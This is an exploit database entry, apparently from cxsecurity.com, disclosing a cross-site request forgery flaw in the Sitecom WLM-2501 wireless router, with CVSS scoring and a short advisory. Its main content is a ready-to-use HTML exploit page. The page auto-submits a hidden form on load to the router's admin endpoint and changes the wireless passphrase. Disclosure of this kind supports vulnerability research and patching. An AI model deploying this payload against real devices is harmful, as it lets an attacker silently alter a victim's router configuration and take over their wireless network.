Sitecom WLM-2501 Cross Site Request Forgery

2012-03-14 / 2013-01-26
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Sitecom WLM-2501 Change Wireless Passphrase # Date : 13-03-2012 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Vendor site : http://www.sitecom.com/wireless-modem-router-300n/p/859 # Version : WLM-2501 # Tested on : WLM-2501 (All Sitecom WL series might be is affected by these vulnerabilities) # Original Advisory: http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction 2)Vulnerability Description 3)Exploit +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Sitecom WLM-2501 is a Wireless Modem Router 300N which uses a web management interface - listening to default on tcp/ip port 80 - and "admin" as default administrator. His default ip address is 192.168.0.1. 2)Vulnerability Description The web interface of this router is affected by muktiple CSRF vulnerabilities which allows to change router parameters and - among other things - to change Wireless Passphrase. 3)Exploit <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to change Wireless Passphrase</H2> <form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlEncrypt"> <input type="hidden" name="wlanDisabled" value="OFF"/> <input type="hidden" name="method" value="6"/> <input type="hidden" name="wpaAuth" value="psk"/> <input type="hidden" name="pskFormat" value="0"/> <input type="hidden" name="pskValue" value="newpassword"/> <input type="hidden" name="submit-url" value="%2Fwlwpa.asp"/> <input type="hidden" name="save" value="Apply"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------+

References:

http://www.sitecom.com/wireless-modem-router-300n/p/859
http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top